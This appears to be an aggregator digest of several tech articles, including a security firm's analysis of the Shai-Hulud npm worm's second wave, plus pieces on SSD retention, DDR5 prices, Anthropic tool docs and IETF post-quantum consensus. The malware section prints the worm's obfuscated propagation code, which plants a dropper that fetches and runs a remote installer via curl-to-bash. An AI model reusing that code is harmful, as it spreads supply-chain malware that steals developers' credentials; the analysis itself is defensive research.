Tool search matches against names and descriptions, so clear, descriptive definitions improve discovery accuracy.

// Good
{
  "name": "search_customer_orders",
  "description": "Search for customer orders by date range, status, or total amount. Returns order details including items, shipping, and payment info."
}

// Bad
{
  "name": "query_db_orders",
  "description": "Execute order query"
}

Add system prompt guidance so Claude knows what's available:

You have access to tools for Slack messaging, Google Drive file management,
Jira ticket tracking, and GitHub repository operations. Use the tool search
to find specific capabilities.

Keep your three to five most-used tools always loaded, defer the rest. This balances immediate access for common operations with on-demand discovery for everything else.

Since Claude writes code to parse tool outputs, document return formats clearly. This helps Claude write correct parsing logic:

{
  "name": "get_orders",
  "description": "Retrieve orders for a customer.

    Returns:
      List of order objects, each containing:
      - id (str): Order identifier
      - total (float): Order total in USD
      - status (str): One of 'pending', 'shipped', 'delivered'
      - items (list): Array of {sku, quantity, price}
      - created_at (str): ISO 8601 timestamp"
}
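For illustration, here is a sketch of the kind of code Claude could write in the code execution environment against a return format documented this way. It is written in the same style as the orchestration example earlier in this article: get_orders is the hypothetical tool defined above, the customer ID is made up, and the snippet assumes it runs inside the sandbox where tools are exposed as async functions.

# Illustrative fragment only, assuming the code execution sandbox described above.
import json

orders = await get_orders("CUST-001")  # hypothetical customer ID

# Total value of orders that are not yet delivered
open_total = sum(o["total"] for o in orders if o["status"] in ("pending", "shipped"))

# Most recent order, relying on the documented ISO 8601 created_at field
latest = max(orders, key=lambda o: o["created_at"])

print(json.dumps({"open_total": open_total, "latest_order_id": latest["id"]}))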

Opt in the tools that benefit from programmatic orchestration, such as tools that can run in parallel (independent operations).

Set up Tool Use Examples for parameter accuracy:

* Use realistic data (real city names, plausible prices, not "string" or "value")
* Keep it concise: 1-5 examples per tool
* Focus on ambiguity (only add examples where correct usage isn't obvious from schema)

These features are available in beta. To enable them, add the beta header and include the tools you need:

client.beta.messages.create(
    betas=["advanced-tool-use-2025-11-20"],
    model="claude-sonnet-4-5-20250929",
    max_tokens=4096,

...

Read the original on www.anthropic.com »

5 354 shares, 40 trendiness

The unpowered SSDs in your drawer are slowly losing your data

After a 7-year cor­po­rate stint, Tanveer found his love for writ­ing and tech too much to re­sist. An MBA in Marketing and the owner of a PC build­ing busi­ness, he writes on PC hard­ware, tech­nol­ogy, and Windows. When not scour­ing the web for ideas, he can be found build­ing PCs, watch­ing anime, or play­ing Smash Karts on his RTX 3080 (sigh).


SSDs have all but re­placed hard dri­ves when it comes to pri­mary stor­age. They’re or­ders of mag­ni­tude faster, more con­ve­nient, and con­sume less power than me­chan­i­cal hard dri­ves. That said, if you’re also us­ing SSDs for cold stor­age, ex­pect­ing the dri­ves ly­ing in your drawer to work per­fectly af­ter years, you might want to re­think your strat­egy. Your re­li­able SSD could suf­fer from cor­rupted or lost data if left un­pow­ered for ex­tended pe­ri­ods. This is why many users don’t con­sider SSDs a re­li­able long-term stor­age medium, and pre­fer us­ing hard dri­ves, mag­netic tape, or M-Disc in­stead.

Your SSD data is­n’t as per­ma­nent as you think

Unlike hard dri­ves that mag­ne­tize spin­ning discs to store data, SSDs mod­ify the elec­tri­cal charge in NAND flash cells to rep­re­sent 0 and 1. NAND flash re­tains data in un­der­ly­ing tran­sis­tors even when power is re­moved, sim­i­lar to other forms of non-volatile mem­ory. However, the du­ra­tion for which your SSD can re­tain data with­out power is the key here. Even the cheap­est SSDs, say those with QLC NAND, can safely store data for about a year of be­ing com­pletely un­pow­ered. More ex­pen­sive TLC NAND can re­tain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of un­pow­ered stor­age, re­spec­tively.

The prob­lem is that most con­sumer SSDs use only TLC or QLC NAND, so users who leave their SSDs un­pow­ered for over a year are risk­ing the in­tegrity of their data. The re­li­a­bil­ity of QLC NAND has im­proved over the years, so you should prob­a­bly con­sider 2–3 years of un­pow­ered us­age as the guardrails. Without power, the volt­age stored in the NAND cells can be lost, ei­ther re­sult­ing in miss­ing data or com­pletely use­less dri­ves.

This data re­ten­tion de­fi­ciency of con­sumer SSDs makes them an un­re­li­able medium for long-term data stor­age, es­pe­cially for cre­ative pro­fes­sion­als and re­searchers. HDDs can suf­fer from bit rot, too, due to wear and tear, but they’re still more re­sis­tant to power loss. If you haven’t checked your archives in a while, I’d rec­om­mend do­ing so at the ear­li­est.

But, most peo­ple don’t need to worry about it

The sce­nario I de­scribed above is­n’t rel­e­vant to peo­ple out­side en­ter­prise, en­thu­si­ast, and solo­pre­neur us­age. The need to store tons of data for years on dri­ves that aren’t plugged in is­n’t a con­cern for most peo­ple, who use one or two SSDs on their PC that might be left with­out power for only a few months, at the max­i­mum. You’ve prob­a­bly lost data on your SSD due to a rare power surge or a faulty drive rather than volt­age loss. Some fac­tors, like tem­per­a­ture and the qual­ity of the un­der­ly­ing NAND flash, can ac­cel­er­ate this volt­age loss.

SSDs aren’t eter­nal, even if you keep them pow­ered on for­ever. The lim­ited write cy­cles of NAND flash will even­tu­ally bring an SSD to the end of its life­cy­cle, but the ma­jor­ity of users will prob­a­bly re­place the drive be­fore that ever hap­pens. So, you don’t need to worry about writ­ing too much data to your SSD or leav­ing your PC turned off for days, weeks, or even months. Just don’t trust an un­pow­ered SSD that’s gath­er­ing dust in the house for years, which brings me to my next point.


You should al­ways have a backup any­way

Prevention is bet­ter than cure

Backing up your data is the simplest strategy to counteract the limitations of storage media. Having multiple copies of your data on different types of storage ensures that an unexpected incident doesn't make your data vanish forever. This is exactly what the 3-2-1 backup rule talks about: 3 copies of data on at least 2 different storage media, with 1 copy stored off-site. For most people, this condition can easily be fulfilled by using their primary computer, a NAS, and cloud storage. Redundancy is the underlying principle that safeguards your data.

Whether it’s the lim­ited lifes­pan of your SSD, the po­ten­tial for harm­ful ex­i­gen­cies like power fail­ure, or the lim­its of data re­ten­tion on flash stor­age, your backup will en­sure your peace of mind. Yes, SSDs aren’t the best choice for cold stor­age, but even if you’re us­ing hard dri­ves, hav­ing a sin­gle copy of your data is ask­ing for trou­ble. Every user will come face-to-face with drive fail­ure sooner or later, so in­vest­ing in a ro­bust backup sys­tem is­n’t re­ally op­tional if you care about your data.


Store it and for­get it does­n’t work for SSDs

As long as you’re us­ing con­sumer SSDs for pri­mary stor­age on your PC, it’s all well and good. You’ll most likely re­place your drive long be­fore ex­haust­ing its P/E cy­cles. For long-term stor­age, how­ever, re­ly­ing on SSDs is risky, since they can lose data if left with­out power for years. This data loss can oc­cur any­time from 1 to 3 years of keep­ing your SSDs un­pow­ered, so us­ing al­ter­nate stor­age me­dia and in­vest­ing in a backup sys­tem should be your pri­or­i­ties.

...

Read the original on www.xda-developers.com »

6 347 shares, 25 trendiness

An entire PS5 now costs less than 64GB of DDR5 memory, even after a discount — simple memory kit jumps to $600 due to DRAM shortage, and it's expected to get worse into 2026

Thanks to the AI boom devouring the majority of the world's memory and storage supply, end-consumers are now facing increasingly inflated prices for common components. DDR5 RAM, a necessity for building current-gen Intel or AMD systems, has now reached record highs in terms of pricing; a 64 GB kit of G.Skill's Trident Z5 Neo 6000 MT/s RAM is listed at $599.99 on Newegg right now — that's $200 more than a PS5 Slim or a Microsoft Xbox Series S, and just $50 shy of an entire PS5 Pro at the moment.

That $600 price tag has a 6% dis­count al­ready ap­plied to its orig­i­nal $640 ask, as part of a Black Friday deal. For con­text, a more ex­clu­sive 64 GB lim­ited edi­tion Corsair Dominator Titanium kit cost only $349 when we re­viewed it a few months ago. Earlier this year, we posted about DDR5 deals on Prime Day where the stan­dard edi­tion of the same kit was just $299, and you could get other com­pa­ra­ble 64 GB kits for as low as $140.

A quick glance at price tracking data shows that G.Skill's Trident Z5 Neo kit has regularly sat at $205-$220 for the past few months, and it was only in late October that it started to pick up steam. From September 20th, when it was listed at $220, to $640 now, in just 2 months we've witnessed an astounding ~190% surge.

Right as this particular Trident Z5 Neo kit began to skyrocket in price, the industry first started to pick up on the effects of the AI crunch. A few days later we published our initial coverage on DDR5 RAM price hikes; from there, the situation has only worsened to reach worrying levels.

Insane mark-up aside, the kit itself is one of the best on the market, recommended as the top pick for DDR5 memory in our roundup. Unfortunately, it seems like high prices are going to be the story going forward. The surge in demand for AI projects will see production lines prioritize serving AI clients, leaving consumers to pay through the nose or make the best of what they have. Experts speculate that both DRAM and NAND constraints will become normal throughout 2026 as Big Tech looks to pursue AGI.

In the mean­time, hard dri­ves are van­ish­ing from store shelves to the point where mi­croSD cards are serv­ing as a fea­si­ble re­place­ment for them. Large-capacity near­line HDDs are back­o­rdered for 2 years, as a re­sult of which QLC SSDs are now be­ing swept up at alarm­ing rates. Many dis­trib­u­tors are even sell­ing mem­ory and moth­er­boards bun­dled to­gether to com­bat the global short­age.

Even Valve’s up­com­ing Steam Machine will end up cost­ing more than ex­pected due to the pro­duc­tion win­dow of the de­vice align­ing with the DRAM cri­sis. That be­ing said, mem­ory has al­most al­ways lived in a roller­coaster cy­cle, with man­u­fac­tur­ers over­sup­ply­ing for a cou­ple of years, then un­der­sup­ply­ing for the next few. Looking at it op­ti­misti­cally, you’re prob­a­bly go­ing to find DDR5 at bar­gain prices again in 2027.


...

Read the original on www.tomshardware.com »

7 342 shares, 21 trendiness

Malware Supply-Chain Attack Hits Zapier & ENS Domains

It's another Monday morning, sitting down at the computer, and I see a stack of alerts from the last hour of packages showing signs of malware in our triage queue. Having not yet finished my first cup of coffee, I see Shai Hulud indicators. Yikes, surely that's a false positive? Nope, welcome to Monday, Shai Hulud struck again. Strap in.

Timeline of the Shai-Hulud Campaign

The timing is notable, given npm's recent announcement that it will revoke classic tokens on December 9 after the wave of supply-chain attacks. With many users still not migrated to trusted publishing, the attacker seized the moment for one more hit before npm's deadline.

* August 27 - We release our report detailing the S1ngularity campaign targeting several nx packages on npm.
* September 16 - The attacker strikes again, launching the first wave of the Shai-Hulud attacks.
* September 18 - We publish a follow-up analysis, diving deeper into the campaign's technical quirks and early payload behavior.
* November 24 - A second strike occurs, dubbed the "Second Coming" by the attackers, timed just before npm's deadline for revoking old tokens.

Shai-Hulud, named after the gigantic sandworms from Dune as part of the attacker's flair for theatrics, is a self-replicating npm worm built to spread quickly through compromised developer environments. Once it infects a system, it searches for exposed secrets such as API keys and tokens using TruffleHog and publishes anything it finds to a public GitHub repository. It then attempts to push new copies of itself to npm, helping it propagate across the ecosystem, while exfiltrating data back to the attacker. Keeping with the dramatic theme, the attacker refers to this latest wave as the "Second Coming."

This time around, there are some significant differences in the attack:

* It installs bun with the file setup_bun.js and then uses that to execute bun_environment.js, which is the actual malicious code.
* It creates a randomly named repository with stolen data, rather than a hardcoded name.
* It will infect up to 100 npm packages, compared to 20 last time.
* If it can't authenticate with GitHub or NPM, it will wipe all files in the user's home directory.

We've detected the following packages compromised with a new version of Shai Hulud. Between them, these 492 packages have a total of 132 million monthly downloads:

This time, the malware also publishes secrets to GitHub, with a random name and the repository description:

Currently we see 26.3k repositories exposed:

As we've been analyzing all these packages, we've noticed a number of compromised packages that appear to be from community spread, which contain the initial staging code in setup_bun.js, but NOT bun_environment.js, which is the Shai Hulud worm itself. Here's the code that spreads the worm into other packages:

let _0x2bd41c = a0_0x459ea5.join(_0x349b3d, package’, setup_bun.js”);

await iL0(_0x2bd41c, "#!/usr/bin/env node\nconst { spawn, execSync } = require('child_process');\nconst path = require('path');\nconst fs = require('fs');\nconst os = require('os');\n\nfunction isBunOnPath() {\n try {\n const command = process.platform === 'win32' ? 'where bun' : 'which bun';\n execSync(command, { stdio: 'ignore' });\n return true;\n } catch {\n return false;\n }\n}\n\nfunction reloadPath() {\n // Reload PATH environment variable\n if (process.platform === 'win32') {\n try {\n // On Windows, get updated PATH from registry\n const result = execSync('powershell -c \"[Environment]::GetEnvironmentVariable(\\'PATH\\', \\'User\\') + \\';\\' + [Environment]::GetEnvironmentVariable(\\'PATH\\', \\'Machine\\')\"', {\n encoding: 'utf8'\n });\n process.env.PATH = result.trim();\n } catch {\n }\n } else {\n try {\n // On Unix systems, source common shell profile files\n const homeDir = os.homedir();\n const profileFiles = [\n path.join(homeDir, '.bashrc'),\n path.join(homeDir, '.bash_profile'),\n path.join(homeDir, '.profile'),\n path.join(homeDir, '.zshrc')\n ];\n\n // Try to source profile files to get updated PATH\n for (const profileFile of profileFiles) {\n if (fs.existsSync(profileFile)) {\n try {\n const result = execSync(`bash -c \"source ${profileFile} && echo $PATH\"`, {\n encoding: 'utf8',\n stdio: ['pipe', 'pipe', 'ignore']\n });\n if (result && result.trim()) {\n process.env.PATH = result.trim();\n break;\n }\n } catch {\n // Continue to next profile file\n }\n }\n }\n\n // Also check if ~/.bun/bin exists and add it to PATH if not already there\n const bunBinDir = path.join(homeDir, '.bun', 'bin');\n if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {\n process.env.PATH = `${bunBinDir}:${process.env.PATH}`;\n }\n } catch {}\n }\n}\n\nasync function downloadAndSetupBun() {\n try {\n let command;\n if (process.platform === 'win32') {\n // Windows: Use PowerShell script\n command = 'powershell -c \"irm bun.sh/install.ps1|iex\"';\n } else {\n // Linux/macOS: Use curl + bash script\n command = 'curl -fsSL https://bun.sh/install | bash';\n }\n\n execSync(command, {\n stdio: 'ignore',\n env: { ...process.env }\n });\n\n // Reload PATH to pick up newly installed bun\n reloadPath();\n\n // Find bun executable after installation\n const bunPath = findBunExecutable();\n if (!bunPath) {\n throw new Error('Bun installation completed but executable not found');\n }\n\n return bunPath;\n } catch {\n process.exit(0);\n }\n}\n\nfunction findBunExecutable() {\n // Common locations where bun might be installed\n const possiblePaths = [];\n\n if (process.platform === 'win32') {\n // Windows locations\n const userProfile = process.env.USERPROFILE || '';\n possiblePaths.push(\n path.join(userProfile, '.bun', 'bin', 'bun.exe'),\n path.join(userProfile, 'AppData', 'Local', 'bun', 'bun.exe')\n );\n } else {\n // Unix locations\n const homeDir = os.homedir();\n possiblePaths.push(\n path.join(homeDir, '.bun', 'bin', 'bun'),\n '/usr/local/bin/bun',\n '/opt/bun/bin/bun'\n );\n }\n\n // Check if bun is now available on PATH\n if (isBunOnPath()) {\n return 'bun';\n }\n\n // Check common installation paths\n for (const bunPath of possiblePaths) {\n if (fs.existsSync(bunPath)) {\n return bunPath;\n }\n }\n\n return null;\n}\n\nfunction runExecutable(execPath, args = [], opts = {}) {\n const child = spawn(execPath, args, {\n stdio: 'ignore',\n cwd: opts.cwd || process.cwd(),\n
env: Object.assign({}, process.env, opts.env || {})\n });\n\n child.on('error', (err) => {\n process.exit(0);\n });\n\n child.on('exit', (code, signal) => {\n if (signal) {\n process.exit(0);\n } else {\n process.exit(code === null ? 1 : code);\n }\n });\n}\n\n// Main execution\nasync function main() {\n let bunExecutable;\n\n if (isBunOnPath()) {\n // Use bun from PATH\n bunExecutable = 'bun';\n } else {\n // Check if we have a locally downloaded bun\n const localBunDir = path.join(__dirname, 'bun-dist');\n const possiblePaths = [\n path.join(localBunDir, 'bun', 'bun'),\n path.join(localBunDir, 'bun', 'bun.exe'),\n path.join(localBunDir, 'bun.exe'),\n path.join(localBunDir, 'bun')\n ];\n\n const existingBun = possiblePaths.find(p => fs.existsSync(p));\n\n if (existingBun) {\n bunExecutable = existingBun;\n } else {\n // Download and setup bun\n bunExecutable = await downloadAndSetupBun();\n }\n }\n\n const environmentScript = path.join(__dirname, 'bun_environment.js');\n if (fs.existsSync(environmentScript)) {\n runExecutable(bunExecutable, [environmentScript]);\n } else {\n process.exit(0);\n }\n}\n\nmain().catch((error) => {\n process.exit(0);\n});\n");

let _0x3ed61a = process.argv[0x1];

if (_0x3ed61a && (await My1(_0x3ed61a))) {

let _0x1028dd = await mL0(_0x3ed61a);

if (_0x1028dd !== null) {

let _0x4cc8b3 = a0_0x459ea5.join(_0x349b3d, "package", "bun_environment.js");

await iL0(_0x4cc8b3, _0x1028dd);

}

We see that bun_environment.js may sometimes not be bundled, depending on different factors. It appears that the attackers once again made mistakes, which seems to have limited the impact of the attack at this time. The AsyncAPI team detected a branch of their CLI project, created just prior to the malicious packages being pushed, that deployed a version of the Shai-Hulud malware. This suggests that the attackers may have used a technique similar to the one behind the original Nx compromise. Given the nature of the incident, we were very happy to see the affected companies quickly acknowledge what happened in their own posts.

We detected the first compromised packages starting at 11/24/2025 3:16:26 AM GMT+0: go-template, plus 36 packages from AsyncAPI. Many more packages were quickly compromised. Afterwards, the attackers started compromising PostHog packages at 11/24/2025 4:11:55 AM GMT+0, and Postman packages at 11/24/2025 5:09:25 AM GMT+0.
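If you want to check whether one of your own projects pulled in an affected release, the dropper artifacts above give you something concrete to look for. Below is a minimal sketch, assuming Node.js and a standard node_modules layout; the script name check-shai-hulud.js and its output format are ours, not part of the malware or of any official tooling. It flags installed packages that ship setup_bun.js or bun_environment.js, or that invoke setup_bun.js from an install hook.

// check-shai-hulud.js - hypothetical helper, not an official tool.
// Walks node_modules and flags packages that ship the dropper files
// described above, or that run setup_bun.js from an install hook.
const fs = require('fs');
const path = require('path');

const MARKERS = ['setup_bun.js', 'bun_environment.js'];

function scan(dir, findings = []) {
  if (!fs.existsSync(dir)) return findings;
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    if (!entry.isDirectory()) continue;
    const pkgDir = path.join(dir, entry.name);
    if (entry.name.startsWith('@')) { // scoped packages nest one level deeper
      scan(pkgDir, findings);
      continue;
    }
    for (const marker of MARKERS) {
      if (fs.existsSync(path.join(pkgDir, marker))) {
        findings.push(`${pkgDir}: contains ${marker}`);
      }
    }
    try {
      const pkg = JSON.parse(fs.readFileSync(path.join(pkgDir, 'package.json'), 'utf8'));
      for (const hook of ['preinstall', 'install', 'postinstall']) {
        const cmd = (pkg.scripts || {})[hook];
        if (cmd && cmd.includes('setup_bun.js')) {
          findings.push(`${pkgDir}: ${hook} runs "${cmd}"`);
        }
      }
    } catch {} // no package.json, or it is unreadable
    scan(path.join(pkgDir, 'node_modules'), findings); // nested dependencies
  }
  return findings;
}

const findings = scan(path.resolve('node_modules'));
console.log(findings.length ? findings.join('\n') : 'No known dropper artifacts found.');

A hit is only a signal to investigate further; the definitive check is still comparing installed versions against the published lists of compromised packages.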

Threat actors have slipped malicious code into hundreds of NPM packages, including major ones from Zapier, ENS, AsyncAPI, PostHog, Browserbase, and Postman. If a developer installs one of these bad packages, the malware quietly runs during installation, before the install even finishes. This gives it access to the developer’s machine, build systems, or cloud environment. It then uses an automated tool (TruffleHog) to search for sensitive information like passwords, API keys, cloud tokens, and GitHub or NPM credentials. Anything it finds is uploaded to a public GitHub repository labeled “Sha1-Hulud: The Second Coming.” If those stolen secrets include access to code repositories or package registries, attackers can use them to break into more accounts and publish more malicious packages, helping the attack spread further. Because trusted ecosystems were involved and millions of downloads are affected, any team using NPM should immediately check whether they were impacted and rotate any credentials that may have leaked.
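Since the exfiltration repositories share that description, they are also straightforward to search for. Below is a minimal sketch, assuming Node 18+ (for the built-in fetch) and an optional GITHUB_TOKEN for a higher rate limit; the script name find-exfil-repos.js and the exact query are ours, based only on the repository description quoted above.

// find-exfil-repos.js - hypothetical helper using GitHub's public repository search API.
// Lists repositories whose description matches the Shai-Hulud marker.
const QUERY = encodeURIComponent('"Sha1-Hulud: The Second Coming" in:description');

async function main() {
  const headers = { Accept: 'application/vnd.github+json' };
  if (process.env.GITHUB_TOKEN) {
    headers.Authorization = `Bearer ${process.env.GITHUB_TOKEN}`;
  }
  const res = await fetch(`https://api.github.com/search/repositories?q=${QUERY}&per_page=100`, { headers });
  if (!res.ok) throw new Error(`GitHub search failed: HTTP ${res.status}`);
  const data = await res.json();
  console.log(`${data.total_count} repositories match`);
  for (const repo of data.items) {
    console.log(`${repo.full_name}\t${repo.created_at}`);
  }
}

main().catch((err) => { console.error(err); process.exit(1); });

Adding a user: or org: qualifier to the query narrows the search to accounts your team controls.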

Rotate all GitHub, npm, cloud, and CI/CD secrets used during installs.

Check GitHub for strange repos with the description “Sha1-Hulud: The Second Coming”.

Disable npm postinstall scripts in CI where possible.

Pin package versions and enforce MFA on GitHub and npm accounts.

Use tools like Safe-Chain to block malicious packages on NPM.

Charlie Eriksen is a Security Researcher at Aikido Security, with extensive experience across IT security, including in product and leadership roles. He is the founder of jswzl and he previously worked at Secure Code Warrior as a security researcher and co-founded Adversary.

...

Read the original on www.aikido.dev »

8 304 shares, 14 trendiness

NSA and IETF, part 3

2025.11.23: NSA and IETF, part 4: An ex­am­ple of cen­sored dis­sent. #pqcrypto #hybrids #nsa #ietf #scope

2025.11.23: NSA and IETF, part 3: Dodging the is­sues at hand. #pqcrypto #hybrids #nsa #ietf #dodging

2025.10.05: MODPOD: The collapse of IETF’s protections for dissent. #ietf #objections #censorship #hybrids

2025.10.04: NSA and IETF: Can an at­tacker sim­ply pur­chase stan­dard­iza­tion of weak­ened cryp­tog­ra­phy? #pqcrypto #hybrids #nsa #ietf #antitrust

2025.09.30: Surreptitious sur­veil­lance: On the im­por­tance of not be­ing seen. #marketing #stealth #nsa

2025.04.23: McEliece stan­dard­iza­tion: Looking at what’s hap­pen­ing, and an­a­lyz­ing ra­tio­nales. #nist #iso #deployment #performance #security

2025.01.18: As ex­pen­sive as a plane flight: Looking at some claims that quan­tum com­put­ers won’t work. #quantum #energy #variables #errors #rsa #secrecy

2024.10.28: The sins of the 90s:

2024.08.03: Clang vs. Clang: You’re mak­ing Clang an­gry. You would­n’t like Clang when it’s an­gry. #compilers #optimization #bugs #timing #security #codescans

2024.06.12: Bibliography keys: It’s as easy as [1], [2], [3]. #bibliographies #citations #bibtex #votemanipulation #paperwriting

2023.11.25: Another way to botch the se­cu­rity analy­sis of Kyber-512:

2023.10.23: Reducing “gate” counts for Kyber-512: Two algorithm analyses, from first principles, contradicting NIST’s calculation. #xor #popcount #gates #memory #clumping

2023.10.03: The in­abil­ity to count cor­rectly:

2022.08.05: NSA, NIST, and post-quantum cryptography: Announcing my second lawsuit against the U.S. government. #nsa #nist #des #dsa #dualec #sigintenablingproject #nistpqc #foia

2022.01.29: Plagiarism as a patent am­pli­fier:

2020.12.06: Optimizing for the wrong metric, part 1: Microsoft Word: Review of “An Efficiency Comparison of Document Preparation Systems Used in Academic Research and Development” by Knauff and Nejasmic. #latex #word #efficiency #metrics

2019.10.24: Why EdDSA held up bet­ter than ECDSA against Minerva:

2019.04.30: An in­tro­duc­tion to vec­tor­iza­tion: Understanding one of the most im­por­tant changes in the high-speed-soft­ware ecosys­tem. #vectorization #sse #avx #avx512 #antivectors

2017.11.05: Reconstructing ROCA: A case study of how quickly an at­tack can be de­vel­oped from a lim­ited dis­clo­sure. #infineon #roca #rsa

2017.10.17: Quantum al­go­rithms to find col­li­sions: Analysis of sev­eral al­go­rithms for the col­li­sion prob­lem, and for the re­lated multi-tar­get preim­age prob­lem. #collision #preimage #pqcrypto

2017.07.23: Fast-key-erasure ran­dom-num­ber gen­er­a­tors: An ef­fort to clean up sev­eral messes si­mul­ta­ne­ously. #rng #forwardsecrecy #urandom #cascade #hmac #rekeying #proofs

2017.07.19: Benchmarking post-quan­tum cryp­tog­ra­phy: News re­gard­ing the SUPERCOP bench­mark­ing sys­tem, and more rec­om­men­da­tions to NIST. #benchmarking #supercop #nist #pqcrypto

2016.10.30: Some chal­lenges in post-quan­tum stan­dard­iza­tion: My com­ments to NIST on the first draft of their call for sub­mis­sions. #standardization #nist #pqcrypto

2016.06.07: The death of due process: A few notes on tech­nol­ogy-fu­eled nor­mal­iza­tion of lynch mobs tar­get­ing both the ac­cuser and the ac­cused. #ethics #crime #punishment

2016.05.16: Security fraud in Europe’s “Quantum Manifesto”: How quantum cryptographers are stealing a quarter of a billion Euros from the European Commission. #qkd #quantumcrypto #quantummanifesto

2016.03.15: Thomas Jefferson and Apple ver­sus the FBI: Can the gov­ern­ment cen­sor how-to books? What if some of the read­ers are crim­i­nals? What if the books can be un­der­stood by a com­puter? An in­tro­duc­tion to free­dom of speech for soft­ware pub­lish­ers. #censorship #firstamendment #instructions #software #encryption

2015.11.20: Break a dozen se­cret keys, get a mil­lion more for free: Batch at­tacks are of­ten much more cost-ef­fec­tive than sin­gle-tar­get at­tacks. #batching #economics #keysizes #aes #ecc #rsa #dh #logjam

2015.03.14: The death of op­ti­miz­ing com­pil­ers: Abstract of my tu­to­r­ial at ETAPS 2015. #etaps #compilers #cpuevolution #hotspots #optimization #domainspecific #returnofthejedi

2015.02.18: Follow-You Printing: How Equitrac’s mar­ket­ing de­part­ment mis­rep­re­sents and in­ter­feres with your work. #equitrac #followyouprinting #dilbert #officespaceprinter

2014.06.02: The Saber clus­ter: How we built a clus­ter ca­pa­ble of com­put­ing 3000000000000000000000 mul­ti­pli­ca­tions per year for just 50000 EUR. #nvidia #linux #howto

2014.05.17: Some small sug­ges­tions for the Intel in­struc­tion set: Low-cost changes to CPU ar­chi­tec­ture would make cryp­tog­ra­phy much safer and much faster. #constanttimecommitment #vmul53 #vcarry #pipelinedocumentation

2014.04.11: NIST’s cryptographic standardization process: The first step towards improvement is to admit previous failures. #standardization #nist #des #dsa #dualec #nsa

2014.03.23: How to de­sign an el­lip­tic-curve sig­na­ture sys­tem: There are many choices of el­lip­tic-curve sig­na­ture sys­tems. The stan­dard choice, ECDSA, is rea­son­able if you don’t care about sim­plic­ity, speed, and se­cu­rity. #signatures #ecc #elgamal #schnorr #ecdsa #eddsa #ed25519

2014.02.05: Entropy Attacks! The con­ven­tional wis­dom says that hash out­puts can’t be con­trolled; the con­ven­tional wis­dom is sim­ply wrong.

Normal practice in deploying post-quantum cryptography is to deploy ECC+PQ. IETF’s TLS working group is standardizing ECC+PQ. But IETF management is also non-consensually ramming a particular NSA-driven document through the IETF process, a “non-hybrid” document that adds just PQ as another TLS option.

Don’t worry: we’re stan­dard­iz­ing cars with seat­belts. Also, rec­og­niz­ing gen­er­ous fund­ing from the National Morgue Association, we’re go­ing to stan­dard­ize cars with­out seat­belts as an­other op­tion, ig­nor­ing the safety ob­jec­tions. That’s okay, right?

Last month I posted part 1 of this story. Today’s part 2 highlighted the corruption. This blog post, part 3, highlights the dodging in a particular posting at the beginning of this month by an IETF “security area director”. Part 4 will give an example of how dissent on this topic has been censored.

Consensus means what­ever the peo­ple in power want to do.

Recall from my previous blog post that “adoption” of a document is a preliminary step before an IETF “working group” works on, and decides whether to standardize, the document. In April 2025, the chairs of the IETF TLS WG called for “adoption” of this NSA-driven document. During the call period, 20 people expressed unequivocal support for adoption, 2 people expressed conditional support for adoption, and 7 people expressed unequivocal opposition to adoption. (Details for verification.)

The chairs claimed that “we have consensus to adopt this draft”. I promptly asked for explanation.

Before the chairs could even reply, an “area director” interrupted, claiming, inter alia, the following: “There is clearly consensus based on the 67 responses to the adoption call. … The vast majority was in favour of adoption … There were a few dissenting opinions”.

After these lies by the “area director” were debunked, the chairs said that they had declared consensus because “there is clearly sufficient interest to work on this draft”, specifically enough people “willing to review the draft”.

I can understand not everybody being familiar with the specific definition of “consensus” that antitrust law requires standards-development organizations to follow. But it’s astonishing to see chairs substituting a consensus-evaluation procedure that simply ignores objections.

Stonewalling.

The chairs said I could escalate. IETF procedures say that an unresolved dispute can be “brought to the attention of the Area Director(s) for the area in which the Working Group is chartered”, and then “The Area Director(s) shall attempt to resolve the dispute”.

I filed a complaint with the “security area directors” in early June 2025. One of them never replied. The other, the same one who had claimed that there was “clearly consensus”, sent a series of excuses for not handling the complaint. For example, one excuse was that the PDF format “discourages participation”.

Do IETF procedures say “The Area Director(s) shall attempt to resolve the dispute unless the dispute is documented in a PDF”? No.

I sent email two days later systematically addressing the excuses. The “area director” never replied.

It isn’t clear under IETF procedures whether a non-reply allows an appeal. It is, however, clear that an appeal can’t be filed after two months. I escalated to the “Internet Engineering Steering Group” (IESG) in August 2025.

IESG didn’t reply until October 2025. It rejected one of the “Area Director” excuses for having ignored my complaint, but endorsed another excuse. I promptly filed a revised complaint with the “area director”, jumping through the hoops that IESG had set. There were then further runarounds.

The switch.

Suddenly, on 1 November 2025, IESG publicly instructed the “area director” to address the following question: “Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?”

The “area director” posted his conclusion mere hours later: “I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document”.

Dodging pro­ce­dural ob­jec­tions.

Before looking at how the “area director” argued for this conclusion, I’d like to emphasize three things that the “area director” didn’t do.

First, did the “area director” address my complaint about the chair action on this topic? No.

One reason this matters is that the law requires standards-development organizations to provide an “appeals process”. Structurally, the “area director” isn’t quoting and answering the points in my complaint; the “area director” puts the entire burden on the reader to try to figure out what’s supposedly answering what, and to realize that many points remain unanswered.

Second, did the “area director” address the chairs claiming that “we have consensus to adopt this draft”? Or the previous claim from the “area director” that there was “clearly consensus”? No. Instead IESG and this “area director” quietly shifted from “consensus” to “rough consensus”. (Did you notice this shift when I quoted IESG’s “rough consensus” instruction?)

One reason this matters is that “consensus” is another of the legal requirements for standards-development organizations. The law doesn’t allow “rough consensus”. Also, IETF claims that “decision-making requires achieving broad consensus”. “Broad consensus” is even stronger than “consensus”, since it’s saying that there’s consensus in a broad group.

Third, the way that my complaint had established the lack of consensus was, first, by reviewing the general definition of “consensus” (which I paraphrased from the definition in the law, omitting a citation only because the TLS chairs had threatened me with a list ban if I mentioned the law again), and then applying the components of that definition to the situation at hand. Did the “area director” follow this structure? Here’s the definition of “consensus”, or “rough consensus” if we’re switching to that, and now let’s apply that definition? No. Nobody reading this message from the “area director” can figure out what the “area director” believes these words mean.

Wow, look at that: “due process” is another of the legal requirements for standards-development organizations. Part of due process is simply making clear what procedures are being applied. Could it possibly be that the people writing the law were thinking through how standardization processes could be abused?

Numbers.

Without further ado, let’s look at what the “security area director” did write.

The IESG has requested that I evaluate the WG Adoption call results for ML-KEM Post-Quantum Key Agreement for TLS 1.3 (draft-connolly-tls-mlkem-key-agreement). Please see below.

